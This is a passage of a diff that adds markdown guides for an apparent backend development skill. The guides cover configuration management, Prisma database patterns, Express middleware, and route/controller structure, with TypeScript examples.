**7. Register in app.ts:**
```typescript
// app.ts
import userRoutes from './routes/userRoutes';

app.use('/api/users', userRoutes);
```

**Complete Request Flow:**
```
POST /api/users
  ↓
userRoutes matches /
  ↓
SSOMiddleware authenticates
  ↓
controller.createUser called
  ↓
Validates with Zod
  ↓
userService.create called
  ↓
Checks business rules
  ↓
userRepository.create called
  ↓
Prisma creates user
  ↓
Returns up the chain
  ↓
Controller formats response
  ↓
200/201 sent to client
```

---

**Related Files:**

- [SKILL.md](SKILL.md)
- [routing-and-controllers.md](routing-and-controllers.md)
- [services-and-repositories.md](services-and-repositories.md)
- [validation-patterns.md](validation-patterns.md)
275
skills/backend-dev-guidelines/resources/configuration.md
Normal file
@@ -0,0 +1,275 @@
# Configuration Management - UnifiedConfig Pattern
|
||||||
|
|
||||||
|
Complete guide to managing configuration in backend microservices.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [UnifiedConfig Overview](#unifiedconfig-overview)
|
||||||
|
- [NEVER Use process.env Directly](#never-use-processenv-directly)
|
||||||
|
- [Configuration Structure](#configuration-structure)
|
||||||
|
- [Environment-Specific Configs](#environment-specific-configs)
|
||||||
|
- [Secrets Management](#secrets-management)
|
||||||
|
- [Migration Guide](#migration-guide)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## UnifiedConfig Overview
|
||||||
|
|
||||||
|
### Why UnifiedConfig?
|
||||||
|
|
||||||
|
**Problems with process.env:**
|
||||||
|
- ❌ No type safety
|
||||||
|
- ❌ No validation
|
||||||
|
- ❌ Hard to test
|
||||||
|
- ❌ Scattered throughout code
|
||||||
|
- ❌ No default values
|
||||||
|
- ❌ Runtime errors for typos
|
||||||
|
|
||||||
|
**Benefits of unifiedConfig:**
|
||||||
|
- ✅ Type-safe configuration
|
||||||
|
- ✅ Single source of truth
|
||||||
|
- ✅ Validated at startup
|
||||||
|
- ✅ Easy to test with mocks
|
||||||
|
- ✅ Clear structure
|
||||||
|
- ✅ Fallback to environment variables
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## NEVER Use process.env Directly
|
||||||
|
|
||||||
|
### The Rule
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ NEVER DO THIS
|
||||||
|
const timeout = parseInt(process.env.TIMEOUT_MS || '5000');
|
||||||
|
const dbHost = process.env.DB_HOST || 'localhost';
|
||||||
|
|
||||||
|
// ✅ ALWAYS DO THIS
|
||||||
|
import { config } from './config/unifiedConfig';
|
||||||
|
const timeout = config.timeouts.default;
|
||||||
|
const dbHost = config.database.host;
|
||||||
|
```
|
||||||
|
|
||||||
|
### Why This Matters
|
||||||
|
|
||||||
|
**Example of problems:**
|
||||||
|
```typescript
|
||||||
|
// Typo in environment variable name
|
||||||
|
const host = process.env.DB_HSOT; // undefined! No error!
|
||||||
|
|
||||||
|
// Type safety
|
||||||
|
const port = process.env.PORT; // string! Need parseInt
|
||||||
|
const timeout = parseInt(process.env.TIMEOUT); // NaN if not set!
|
||||||
|
```
|
||||||
|
|
||||||
|
**With unifiedConfig:**
|
||||||
|
```typescript
|
||||||
|
const port = config.server.port; // number, guaranteed
|
||||||
|
const timeout = config.timeouts.default; // number, with fallback
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Configuration Structure
|
||||||
|
|
||||||
|
### UnifiedConfig Interface
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
export interface UnifiedConfig {
|
||||||
|
database: {
|
||||||
|
host: string;
|
||||||
|
port: number;
|
||||||
|
username: string;
|
||||||
|
password: string;
|
||||||
|
database: string;
|
||||||
|
};
|
||||||
|
server: {
|
||||||
|
port: number;
|
||||||
|
sessionSecret: string;
|
||||||
|
};
|
||||||
|
tokens: {
|
||||||
|
jwt: string;
|
||||||
|
inactivity: string;
|
||||||
|
internal: string;
|
||||||
|
};
|
||||||
|
keycloak: {
|
||||||
|
realm: string;
|
||||||
|
client: string;
|
||||||
|
baseUrl: string;
|
||||||
|
secret: string;
|
||||||
|
};
|
||||||
|
aws: {
|
||||||
|
region: string;
|
||||||
|
    emailQueueUrl: string;
    accessKeyId: string;
    secretAccessKey: string;
  };
  sentry: {
    dsn: string;
    environment: string;
    tracesSampleRate: number;
  };
  // ... more sections
}
```

### Implementation Pattern

**File:** `/blog-api/src/config/unifiedConfig.ts`

```typescript
import * as fs from 'fs';
import * as path from 'path';
import * as ini from 'ini';

const configPath = path.join(__dirname, '../../config.ini');
const iniConfig = ini.parse(fs.readFileSync(configPath, 'utf-8'));

export const config: UnifiedConfig = {
  database: {
    host: iniConfig.database?.host || process.env.DB_HOST || 'localhost',
    port: parseInt(iniConfig.database?.port || process.env.DB_PORT || '3306'),
    username: iniConfig.database?.username || process.env.DB_USER || 'root',
    password: iniConfig.database?.password || process.env.DB_PASSWORD || '',
    database: iniConfig.database?.database || process.env.DB_NAME || 'blog_dev',
  },
  server: {
    port: parseInt(iniConfig.server?.port || process.env.PORT || '3002'),
    sessionSecret: iniConfig.server?.sessionSecret || process.env.SESSION_SECRET || 'dev-secret',
  },
  // ... more configuration
};

// Validate critical config
if (!config.tokens.jwt) {
  throw new Error('JWT secret not configured!');
}
```

**Key Points:**
- Read from config.ini first
- Fall back to process.env
- Default values for development
- Validation at startup
- Type-safe access

---

## Environment-Specific Configs

### config.ini Structure

```ini
[database]
host = localhost
port = 3306
username = root
password = password1
database = blog_dev

[server]
port = 3002
sessionSecret = your-secret-here

[tokens]
jwt = your-jwt-secret
inactivity = 30m
internal = internal-api-token

[keycloak]
realm = myapp
client = myapp-client
baseUrl = http://localhost:8080
secret = keycloak-client-secret

[sentry]
dsn = https://your-sentry-dsn
environment = development
tracesSampleRate = 0.1
```

### Environment Overrides

```bash
# .env file (optional overrides)
DB_HOST=production-db.example.com
DB_PASSWORD=secure-password
PORT=80
```

**Precedence:**
1. config.ini (highest priority)
2. process.env variables
3. Hard-coded defaults (lowest priority)
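
The precedence chain can be expressed as a small helper (a hypothetical sketch; the real `unifiedConfig.ts` inlines the chain with `||` as shown earlier):

```typescript
// Hypothetical helper mirroring the precedence chain:
// an ini value wins, then an environment variable, then the hard-coded default.
// Note: `||` (as used in unifiedConfig.ts) also skips empty strings,
// whereas `??` would only skip null/undefined.
function resolveSetting(
  iniValue: string | undefined,
  envValue: string | undefined,
  fallback: string
): string {
  return iniValue || envValue || fallback;
}

// Example: no ini entry, env override present
const dbPort = resolveSetting(undefined, '3307', '3306'); // '3307'
```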

---

## Secrets Management

### DO NOT Commit Secrets

```gitignore
# .gitignore
config.ini
.env
sentry.ini
*.pem
*.key
```

### Use Environment Variables in Production

```typescript
// Development: config.ini
// Production: Environment variables

export const config: UnifiedConfig = {
  database: {
    password: process.env.DB_PASSWORD || iniConfig.database?.password || '',
  },
  tokens: {
    jwt: process.env.JWT_SECRET || iniConfig.tokens?.jwt || '',
  },
};
```

---

## Migration Guide

### Find All process.env Usage

```bash
grep -r "process.env" blog-api/src/ --include="*.ts" | wc -l
```

### Migration Example

**Before:**
```typescript
// Scattered throughout code
const timeout = parseInt(process.env.OPENID_HTTP_TIMEOUT_MS || '15000');
const keycloakUrl = process.env.KEYCLOAK_BASE_URL;
const jwtSecret = process.env.JWT_SECRET;
```

**After:**
```typescript
import { config } from './config/unifiedConfig';

const timeout = config.keycloak.timeout;
const keycloakUrl = config.keycloak.baseUrl;
const jwtSecret = config.tokens.jwt;
```

**Benefits:**
- Type-safe
- Centralized
- Easy to test
- Validated at startup

---

**Related Files:**
- [SKILL.md](SKILL.md)
- [testing-guide.md](testing-guide.md)
224
skills/backend-dev-guidelines/resources/database-patterns.md
Normal file
@@ -0,0 +1,224 @@
# Database Patterns - Prisma Best Practices

Complete guide to database access patterns using Prisma in backend microservices.

## Table of Contents

- [PrismaService Usage](#prismaservice-usage)
- [Repository Pattern](#repository-pattern)
- [Transaction Patterns](#transaction-patterns)
- [Query Optimization](#query-optimization)
- [N+1 Query Prevention](#n1-query-prevention)
- [Error Handling](#error-handling)

---

## PrismaService Usage

### Basic Pattern

```typescript
import { PrismaService } from '@project-lifecycle-portal/database';

// Always use PrismaService.main
const users = await PrismaService.main.user.findMany();
```

### Check Availability

```typescript
if (!PrismaService.isAvailable) {
  throw new Error('Prisma client not initialized');
}

const user = await PrismaService.main.user.findUnique({ where: { id } });
```

---

## Repository Pattern

### Why Use Repositories

✅ **Use repositories when:**
- Complex queries with joins/includes
- Query used in multiple places
- Need caching layer
- Want to mock for testing

❌ **Skip repositories for:**
- Simple one-off queries
- Prototyping (can refactor later)

### Repository Template

```typescript
export class UserRepository {
  async findById(id: string): Promise<User | null> {
    return PrismaService.main.user.findUnique({
      where: { id },
      include: { profile: true },
    });
  }

  async findActive(): Promise<User[]> {
    return PrismaService.main.user.findMany({
      where: { isActive: true },
      orderBy: { createdAt: 'desc' },
    });
  }

  async create(data: Prisma.UserCreateInput): Promise<User> {
    return PrismaService.main.user.create({ data });
  }
}
```
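
One benefit listed above is mockability: a service that depends on the repository rather than on Prisma directly can be tested against an in-memory fake. A minimal sketch with hypothetical types (no Prisma involved):

```typescript
interface UserRecord {
  id: string;
  isActive: boolean;
}

// Hypothetical in-memory stand-in for UserRepository, useful in unit tests.
class FakeUserRepository {
  constructor(private users: UserRecord[]) {}

  async findById(id: string): Promise<UserRecord | null> {
    return this.users.find((u) => u.id === id) ?? null;
  }

  async findActive(): Promise<UserRecord[]> {
    return this.users.filter((u) => u.isActive);
  }
}
```

A service written against this shape can be exercised without a database connection.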

---

## Transaction Patterns

### Simple Transaction

```typescript
const result = await PrismaService.main.$transaction(async (tx) => {
  const user = await tx.user.create({ data: userData });
  const profile = await tx.userProfile.create({ data: { userId: user.id } });
  return { user, profile };
});
```

### Interactive Transaction

```typescript
const result = await PrismaService.main.$transaction(
  async (tx) => {
    const user = await tx.user.findUnique({ where: { id } });
    if (!user) throw new Error('User not found');

    return await tx.user.update({
      where: { id },
      data: { lastLogin: new Date() },
    });
  },
  {
    maxWait: 5000,
    timeout: 10000,
  }
);
```

---

## Query Optimization

### Use select to Limit Fields

```typescript
// ❌ Fetches all fields
const users = await PrismaService.main.user.findMany();

// ✅ Only fetch needed fields
const users = await PrismaService.main.user.findMany({
  select: {
    id: true,
    email: true,
    profile: { select: { firstName: true, lastName: true } },
  },
});
```

### Use include Carefully

```typescript
// ❌ Excessive includes
const user = await PrismaService.main.user.findUnique({
  where: { id },
  include: {
    profile: true,
    posts: { include: { comments: true } },
    workflows: { include: { steps: { include: { actions: true } } } },
  },
});

// ✅ Only include what you need
const user = await PrismaService.main.user.findUnique({
  where: { id },
  include: { profile: true },
});
```

---

## N+1 Query Prevention

### Problem: N+1 Queries

```typescript
// ❌ N+1 Query Problem
const users = await PrismaService.main.user.findMany(); // 1 query

for (const user of users) {
  // N queries (one per user)
  const profile = await PrismaService.main.userProfile.findUnique({
    where: { userId: user.id },
  });
}
```

### Solution: Use include or Batching

```typescript
// ✅ Single query with include
const users = await PrismaService.main.user.findMany({
  include: { profile: true },
});

// ✅ Or batch query
const userIds = users.map(u => u.id);
const profiles = await PrismaService.main.userProfile.findMany({
  where: { userId: { in: userIds } },
});
```
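
With the batch approach, the profiles still have to be stitched back onto their users in memory. A `Map` keyed by `userId` keeps that join linear instead of a nested `find` per user (a self-contained sketch with hypothetical shapes):

```typescript
interface User { id: string; email: string; }
interface Profile { userId: string; firstName: string; }

// Join batch-fetched profiles back onto users in O(n) using a Map,
// instead of an O(n^2) nested array search.
function attachProfiles(users: User[], profiles: Profile[]) {
  const byUserId = new Map(profiles.map((p) => [p.userId, p]));
  return users.map((u) => ({ ...u, profile: byUserId.get(u.id) ?? null }));
}
```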

---

## Error Handling

### Prisma Error Types

```typescript
import { Prisma } from '@prisma/client';

try {
  await PrismaService.main.user.create({ data });
} catch (error) {
  if (error instanceof Prisma.PrismaClientKnownRequestError) {
    // Unique constraint violation
    if (error.code === 'P2002') {
      throw new ConflictError('Email already exists');
    }

    // Foreign key constraint
    if (error.code === 'P2003') {
      throw new ValidationError('Invalid reference');
    }

    // Record not found
    if (error.code === 'P2025') {
      throw new NotFoundError('Record not found');
    }
  }

  // Unknown error
  Sentry.captureException(error);
  throw error;
}
```
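
As more codes are handled, the chain of `if` statements can be flattened into a lookup table. A sketch reusing the messages above (mapping codes to messages is an assumption; adapt it to the project's own error hierarchy):

```typescript
// Map documented Prisma error codes to user-facing messages.
// P2002 = unique constraint, P2003 = foreign key constraint, P2025 = record not found.
const PRISMA_ERROR_MESSAGES: Record<string, string> = {
  P2002: 'Email already exists',
  P2003: 'Invalid reference',
  P2025: 'Record not found',
};

function messageForPrismaCode(code: string): string {
  return PRISMA_ERROR_MESSAGES[code] ?? 'Unexpected database error';
}
```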

---

**Related Files:**
- [SKILL.md](SKILL.md)
- [services-and-repositories.md](services-and-repositories.md)
- [async-and-errors.md](async-and-errors.md)
213
skills/backend-dev-guidelines/resources/middleware-guide.md
Normal file
@@ -0,0 +1,213 @@
# Middleware Guide - Express Middleware Patterns

Complete guide to creating and using middleware in backend microservices.

## Table of Contents

- [Authentication Middleware](#authentication-middleware)
- [Audit Middleware with AsyncLocalStorage](#audit-middleware-with-asynclocalstorage)
- [Error Boundary Middleware](#error-boundary-middleware)
- [Validation Middleware](#validation-middleware)
- [Composable Middleware](#composable-middleware)
- [Middleware Ordering](#middleware-ordering)

---

## Authentication Middleware

### SSOMiddleware Pattern

**File:** `/form/src/middleware/SSOMiddleware.ts`

```typescript
export class SSOMiddlewareClient {
  static verifyLoginStatus(req: Request, res: Response, next: NextFunction): void {
    const token = req.cookies.refresh_token;

    if (!token) {
      res.status(401).json({ error: 'Not authenticated' });
      return;
    }

    try {
      const decoded = jwt.verify(token, config.tokens.jwt);
      res.locals.claims = decoded;
      res.locals.effectiveUserId = decoded.sub;
      next();
    } catch (error) {
      res.status(401).json({ error: 'Invalid token' });
    }
  }
}
```

---

## Audit Middleware with AsyncLocalStorage

### Excellent Pattern from Blog API

**File:** `/form/src/middleware/auditMiddleware.ts`

```typescript
import { AsyncLocalStorage } from 'async_hooks';

export interface AuditContext {
  userId: string;
  userName?: string;
  impersonatedBy?: string;
  sessionId?: string;
  timestamp: Date;
  requestId: string;
}

export const auditContextStorage = new AsyncLocalStorage<AuditContext>();

export function auditMiddleware(req: Request, res: Response, next: NextFunction): void {
  const context: AuditContext = {
    userId: res.locals.effectiveUserId || 'anonymous',
    userName: res.locals.claims?.preferred_username,
    impersonatedBy: res.locals.isImpersonating ? res.locals.originalUserId : undefined,
    timestamp: new Date(),
    requestId: req.id || uuidv4(),
  };

  auditContextStorage.run(context, () => {
    next();
  });
}

// Getter for current context
export function getAuditContext(): AuditContext | null {
  return auditContextStorage.getStore() || null;
}
```

**Benefits:**
- Context propagates through the entire request
- No need to pass context through every function
- Automatically available in services and repositories
- Type-safe context access

**Usage in Services:**
```typescript
import { getAuditContext } from '../middleware/auditMiddleware';

async function someOperation() {
  const context = getAuditContext();
  console.log('Operation by:', context?.userId);
}
```

---

## Error Boundary Middleware

### Comprehensive Error Handler

**File:** `/form/src/middleware/errorBoundary.ts`

```typescript
export function errorBoundary(
  error: Error,
  req: Request,
  res: Response,
  next: NextFunction
): void {
  // Determine status code
  const statusCode = getStatusCodeForError(error);

  // Capture to Sentry
  Sentry.withScope((scope) => {
    scope.setLevel(statusCode >= 500 ? 'error' : 'warning');
    scope.setTag('error_type', error.name);
    scope.setContext('error_details', {
      message: error.message,
      stack: error.stack,
    });
    Sentry.captureException(error);
  });

  // User-friendly response
  res.status(statusCode).json({
    success: false,
    error: {
      message: getUserFriendlyMessage(error),
      code: error.name,
    },
    requestId: Sentry.getCurrentScope().getPropagationContext().traceId,
  });
}

// Async wrapper
export function asyncErrorWrapper(
  handler: (req: Request, res: Response, next: NextFunction) => Promise<any>
) {
  return async (req: Request, res: Response, next: NextFunction) => {
    try {
      await handler(req, res, next);
    } catch (error) {
      next(error);
    }
  };
}
```
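
The wrapper's effect can be seen without Express: a rejection inside the handler is routed to the `next` callback instead of escaping as an unhandled rejection (a minimal sketch with plain functions; the names are illustrative, and in Express 4 this forwarding is what lets async errors reach the error middleware at all):

```typescript
type Next = (err?: unknown) => void;

// Same shape as asyncErrorWrapper above, minus the req/res plumbing:
// any rejection inside the handler is forwarded to next().
function wrapAsync(handler: () => Promise<void>) {
  return async (next: Next) => {
    try {
      await handler();
    } catch (error) {
      next(error);
    }
  };
}
```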

---

## Composable Middleware

### withAuthAndAudit Pattern

```typescript
export function withAuthAndAudit(...authMiddleware: any[]) {
  return [
    ...authMiddleware,
    auditMiddleware,
  ];
}

// Usage
router.post('/:formID/submit',
  ...withAuthAndAudit(SSOMiddlewareClient.verifyLoginStatus),
  async (req, res) => controller.submit(req, res)
);
```

---

## Middleware Ordering

### Critical Order (Must Follow)

```typescript
// 1. Sentry request handler (FIRST)
app.use(Sentry.Handlers.requestHandler());

// 2. Body parsing
app.use(express.json());
app.use(express.urlencoded({ extended: true }));

// 3. Cookie parsing
app.use(cookieParser());

// 4. Auth initialization
app.use(SSOMiddleware.initialize());

// 5. Routes registered here
app.use('/api/users', userRoutes);

// 6. Error handler (AFTER routes)
app.use(errorBoundary);

// 7. Sentry error handler (LAST)
app.use(Sentry.Handlers.errorHandler());
```

**Rule:** Error handlers MUST be registered AFTER all routes!

---

**Related Files:**
- [SKILL.md](SKILL.md)
- [routing-and-controllers.md](routing-and-controllers.md)
- [async-and-errors.md](async-and-errors.md)
@@ -0,0 +1,756 @@
# Routing and Controllers - Best Practices

Complete guide to clean route definitions and controller patterns.

## Table of Contents

- [Routes: Routing Only](#routes-routing-only)
- [BaseController Pattern](#basecontroller-pattern)
- [Good Examples](#good-examples)
- [Anti-Patterns](#anti-patterns)
- [Refactoring Guide](#refactoring-guide)
- [Error Handling](#error-handling)
- [HTTP Status Codes](#http-status-codes)

---

## Routes: Routing Only

### The Golden Rule

**Routes should ONLY:**
- ✅ Define route paths
- ✅ Register middleware
- ✅ Delegate to controllers

**Routes should NEVER:**
- ❌ Contain business logic
- ❌ Access the database directly
- ❌ Implement validation logic (use Zod + controller)
- ❌ Format complex responses
- ❌ Handle complex error scenarios

### Clean Route Pattern

```typescript
// routes/userRoutes.ts
import { Router } from 'express';
import { UserController } from '../controllers/UserController';
import { SSOMiddlewareClient } from '../middleware/SSOMiddleware';
import { auditMiddleware } from '../middleware/auditMiddleware';

const router = Router();
const controller = new UserController();

// ✅ CLEAN: Route definition only
router.get('/:id',
  SSOMiddlewareClient.verifyLoginStatus,
  auditMiddleware,
  async (req, res) => controller.getUser(req, res)
);

router.post('/',
  SSOMiddlewareClient.verifyLoginStatus,
  auditMiddleware,
  async (req, res) => controller.createUser(req, res)
);

router.put('/:id',
  SSOMiddlewareClient.verifyLoginStatus,
  auditMiddleware,
  async (req, res) => controller.updateUser(req, res)
);

export default router;
```

**Key Points:**
- Each route: method, path, middleware chain, controller delegation
- No try-catch needed (the controller handles errors)
- Clean, readable, maintainable
- Easy to see all endpoints at a glance

---

## BaseController Pattern

### Why BaseController?

**Benefits:**
- Consistent error handling across all controllers
- Automatic Sentry integration
- Standardized response formats
- Reusable helper methods
- Performance tracking utilities
- Logging and breadcrumb helpers

### BaseController Pattern (Template)

**File:** `/email/src/controllers/BaseController.ts`

```typescript
import * as Sentry from '@sentry/node';
import { Response } from 'express';

export abstract class BaseController {
  /**
   * Handle errors with Sentry integration
   */
  protected handleError(
    error: unknown,
    res: Response,
    context: string,
    statusCode = 500
  ): void {
    Sentry.withScope((scope) => {
      scope.setTag('controller', this.constructor.name);
      scope.setTag('operation', context);
      scope.setUser({ id: res.locals?.claims?.userId });

      if (error instanceof Error) {
        scope.setContext('error_details', {
          message: error.message,
          stack: error.stack,
        });
      }

      Sentry.captureException(error);
    });

    res.status(statusCode).json({
      success: false,
      error: {
        message: error instanceof Error ? error.message : 'An error occurred',
        code: statusCode,
      },
    });
  }

  /**
   * Handle success responses
   */
  protected handleSuccess<T>(
    res: Response,
    data: T,
    message?: string,
    statusCode = 200
  ): void {
    res.status(statusCode).json({
      success: true,
      message,
      data,
    });
  }

  /**
   * Performance tracking wrapper
   */
  protected async withTransaction<T>(
    name: string,
    operation: string,
    callback: () => Promise<T>
  ): Promise<T> {
    return await Sentry.startSpan(
      { name, op: operation },
      callback
    );
  }

  /**
   * Validate required fields
   */
  protected validateRequest(
    required: string[],
    actual: Record<string, any>,
    res: Response
  ): boolean {
    const missing = required.filter((field) => !actual[field]);

    if (missing.length > 0) {
      Sentry.captureMessage(
        `Missing required fields: ${missing.join(', ')}`,
        'warning'
      );

      res.status(400).json({
        success: false,
        error: {
          message: 'Missing required fields',
          code: 'VALIDATION_ERROR',
          details: { missing },
        },
      });
      return false;
    }
    return true;
  }

  /**
   * Logging helpers
   */
  protected logInfo(message: string, context?: Record<string, any>): void {
    Sentry.addBreadcrumb({
      category: this.constructor.name,
      message,
      level: 'info',
      data: context,
    });
  }

  protected logWarning(message: string, context?: Record<string, any>): void {
    Sentry.captureMessage(message, {
      level: 'warning',
      tags: { controller: this.constructor.name },
      extra: context,
    });
  }

  /**
   * Add Sentry breadcrumb
   */
  protected addBreadcrumb(
    message: string,
    category: string,
    data?: Record<string, any>
  ): void {
    Sentry.addBreadcrumb({ message, category, level: 'info', data });
  }

  /**
   * Capture custom metric
   */
  protected captureMetric(name: string, value: number, unit: string): void {
    Sentry.metrics.gauge(name, value, { unit });
  }
}
```

### Using BaseController

```typescript
// controllers/UserController.ts
import { Request, Response } from 'express';
import { BaseController } from './BaseController';
import { UserService } from '../services/userService';
import { createUserSchema, updateUserSchema } from '../validators/userSchemas';

export class UserController extends BaseController {
  private userService: UserService;

  constructor() {
    super();
    this.userService = new UserService();
  }

  async getUser(req: Request, res: Response): Promise<void> {
    try {
      this.addBreadcrumb('Fetching user', 'user_controller', { userId: req.params.id });

      const user = await this.userService.findById(req.params.id);

      if (!user) {
        return this.handleError(
          new Error('User not found'),
          res,
          'getUser',
          404
        );
      }

      this.handleSuccess(res, user);
    } catch (error) {
      this.handleError(error, res, 'getUser');
    }
  }

  async createUser(req: Request, res: Response): Promise<void> {
    try {
      // Validate input
      const validated = createUserSchema.parse(req.body);

      // Track performance
      const user = await this.withTransaction(
        'user.create',
        'db.query',
        () => this.userService.create(validated)
      );

      this.handleSuccess(res, user, 'User created successfully', 201);
    } catch (error) {
      this.handleError(error, res, 'createUser');
    }
  }

  async updateUser(req: Request, res: Response): Promise<void> {
    try {
      const validated = updateUserSchema.parse(req.body);
      const user = await this.userService.update(req.params.id, validated);
      this.handleSuccess(res, user, 'User updated');
    } catch (error) {
      this.handleError(error, res, 'updateUser');
    }
  }
}
```

**Benefits:**
- Consistent error handling
- Automatic Sentry integration
- Performance tracking
- Clean, readable code
- Easy to test

---

## Good Examples

### Example 1: Email Notification Routes (Excellent ✅)

**File:** `/email/src/routes/notificationRoutes.ts`

```typescript
import { Router } from 'express';
import { NotificationController } from '../controllers/NotificationController';
import { SSOMiddlewareClient } from '../middleware/SSOMiddleware';

const router = Router();
const controller = new NotificationController();

// ✅ EXCELLENT: Clean delegation
router.get('/',
  SSOMiddlewareClient.verifyLoginStatus,
  async (req, res) => controller.getNotifications(req, res)
);

router.post('/',
  SSOMiddlewareClient.verifyLoginStatus,
  async (req, res) => controller.createNotification(req, res)
);

router.put('/:id/read',
  SSOMiddlewareClient.verifyLoginStatus,
  async (req, res) => controller.markAsRead(req, res)
);

export default router;
```

**What Makes This Excellent:**
- Zero business logic in routes
- Clear middleware chain
- Consistent pattern
- Easy to understand

### Example 2: Proxy Routes with Validation (Good ✅)

**File:** `/form/src/routes/proxyRoutes.ts`

```typescript
import { z } from 'zod';

const createProxySchema = z.object({
  originalUserID: z.string().min(1),
  proxyUserID: z.string().min(1),
  startsAt: z.string().datetime(),
  expiresAt: z.string().datetime(),
});

router.post('/',
  SSOMiddlewareClient.verifyLoginStatus,
  async (req, res) => {
    try {
      const validated = createProxySchema.parse(req.body);
      const proxy = await proxyService.createProxyRelationship(validated);
      res.status(201).json({ success: true, data: proxy });
    } catch (error) {
      handler.handleException(res, error);
    }
  }
);
```

**What Makes This Good:**
- Zod validation
- Delegates to service
- Proper HTTP status codes
- Error handling

**Could Be Better:**
- Move validation to controller
- Use BaseController

---

## Anti-Patterns

### Anti-Pattern 1: Business Logic in Routes (Bad ❌)

**File:** `/form/src/routes/responseRoutes.ts` (actual production code)

```typescript
// ❌ ANTI-PATTERN: 200+ lines of business logic in route
router.post('/:formID/submit', async (req: Request, res: Response) => {
  try {
    const username = res.locals.claims.preferred_username;
    const responses = req.body.responses;
    const stepInstanceId = req.body.stepInstanceId;

    // ❌ Permission checking in route
    const userId = await userProfileService.getProfileByEmail(username).then(p => p.id);
    const canComplete = await permissionService.canCompleteStep(userId, stepInstanceId);
    if (!canComplete) {
      return res.status(403).json({ error: 'No permission' });
    }

    // ❌ Workflow logic in route
    const { createWorkflowEngine, CompleteStepCommand } = require('../workflow/core/WorkflowEngineV3');
    const engine = await createWorkflowEngine();
    const command = new CompleteStepCommand(
      stepInstanceId,
      userId,
      responses,
      additionalContext
    );
    const events = await engine.executeCommand(command);

    // ❌ Impersonation handling in route
    if (res.locals.isImpersonating) {
      impersonationContextStore.storeContext(stepInstanceId, {
        originalUserId: res.locals.originalUserId,
        effectiveUserId: userId,
      });
    }

    // ❌ Response processing in route
    const post = await PrismaService.main.post.findUnique({
      where: { id: postData.id },
      include: { comments: true },
    });

    // ❌ Permission check in route
    await checkPostPermissions(post, userId);

    // ... 100+ more lines of business logic

    res.json({ success: true, data: result });
  } catch (e) {
    handler.handleException(res, e);
  }
});
```
|
||||||
|
|
||||||
|
**Why This Is Terrible:**
- 200+ lines of business logic
- Hard to test (requires HTTP mocking)
- Hard to reuse (tied to the route)
- Mixed responsibilities
- Difficult to debug
- Difficult to track performance
### How to Refactor (Step-by-Step)

**Step 1: Create Controller**

```typescript
// controllers/PostController.ts
export class PostController extends BaseController {
  private postService: PostService;

  constructor() {
    super();
    this.postService = new PostService();
  }

  async createPost(req: Request, res: Response): Promise<void> {
    try {
      const validated = createPostSchema.parse({
        ...req.body,
      });

      const result = await this.postService.createPost(
        validated,
        res.locals.userId
      );

      this.handleSuccess(res, result, 'Post created successfully');
    } catch (error) {
      this.handleError(error, res, 'createPost');
    }
  }
}
```
**Step 2: Create Service**

```typescript
// services/postService.ts
export class PostService {
  async createPost(
    data: CreatePostDTO,
    userId: string,
    context: ImpersonationContext // extracted from res.locals by the controller
  ): Promise<PostResult> {
    // Permission check
    const canCreate = await permissionService.canCreatePost(userId);
    if (!canCreate) {
      throw new ForbiddenError('No permission to create post');
    }

    // Execute workflow
    const engine = await createWorkflowEngine();
    const command = new CompleteStepCommand(/* ... */);
    const events = await engine.executeCommand(command);

    // Handle impersonation if needed
    if (context.isImpersonating) {
      await this.handleImpersonation(data.stepInstanceId, context);
    }

    // Synchronize roles
    await this.synchronizeRoles(events, userId);

    return { events, success: true };
  }

  private async handleImpersonation(stepInstanceId: number, context: ImpersonationContext) {
    impersonationContextStore.storeContext(stepInstanceId, {
      originalUserId: context.originalUserId,
      effectiveUserId: context.effectiveUserId,
    });
  }

  private async synchronizeRoles(events: WorkflowEvent[], userId: string) {
    // Role synchronization logic
  }
}
```
**Step 3: Update Route**

```typescript
// routes/postRoutes.ts
import { PostController } from '../controllers/PostController';

const router = Router();
const controller = new PostController();

// ✅ CLEAN: Just routing
router.post('/',
  SSOMiddlewareClient.verifyLoginStatus,
  auditMiddleware,
  async (req, res) => controller.createPost(req, res)
);
```

**Result:**
- Route: 8 lines (was 200+)
- Controller: 25 lines (request handling)
- Service: 50 lines (business logic)
- Testable, reusable, maintainable!
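The last bullet is concrete: once the logic lives in a service with an injected permission checker, a test is a plain function call against a stub, with no HTTP mocking at all. A minimal sketch (the `PostService` and `PermissionChecker` below are simplified stand-ins, not the project's actual classes):

```typescript
// Simplified service with its permission dependency injected, so a test
// can drive it without Express, a database, or HTTP mocks.
class ForbiddenError extends Error {}

interface PermissionChecker {
  canCreatePost(userId: string): Promise<boolean>;
}

class PostService {
  constructor(private permissions: PermissionChecker) {}

  async createPost(data: { title: string }, userId: string) {
    if (!(await this.permissions.canCreatePost(userId))) {
      throw new ForbiddenError('No permission to create post');
    }
    return { title: data.title, authorId: userId };
  }
}

// "Testing" is now two plain calls with in-line stubs:
async function demo(): Promise<string> {
  const allow = new PostService({ canCreatePost: async () => true });
  const deny = new PostService({ canCreatePost: async () => false });

  const post = await allow.createPost({ title: 'Hello' }, 'user-1');
  try {
    await deny.createPost({ title: 'Hello' }, 'user-2');
    return 'unexpected';
  } catch (e) {
    return e instanceof ForbiddenError ? post.authorId : 'wrong error';
  }
}
```

The same stubs work for the denial path, which is exactly the branch that is painful to reach through a fat route.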
---
## Error Handling

### Controller Error Handling

```typescript
async createUser(req: Request, res: Response): Promise<void> {
  try {
    const result = await this.userService.create(req.body);
    this.handleSuccess(res, result, 'User created', 201);
  } catch (error) {
    // BaseController.handleError automatically:
    // - Captures to Sentry with context
    // - Sets appropriate status code
    // - Returns formatted error response
    this.handleError(error, res, 'createUser');
  }
}
```
### Custom Error Status Codes

```typescript
async getUser(req: Request, res: Response): Promise<void> {
  try {
    const user = await this.userService.findById(req.params.id);

    if (!user) {
      // Custom 404 status
      return this.handleError(
        new Error('User not found'),
        res,
        'getUser',
        404 // Custom status code
      );
    }

    this.handleSuccess(res, user);
  } catch (error) {
    this.handleError(error, res, 'getUser');
  }
}
```
### Validation Errors

```typescript
async createUser(req: Request, res: Response): Promise<void> {
  try {
    const validated = createUserSchema.parse(req.body);
    const user = await this.userService.create(validated);
    this.handleSuccess(res, user, 'User created', 201);
  } catch (error) {
    // Zod errors get 400 status
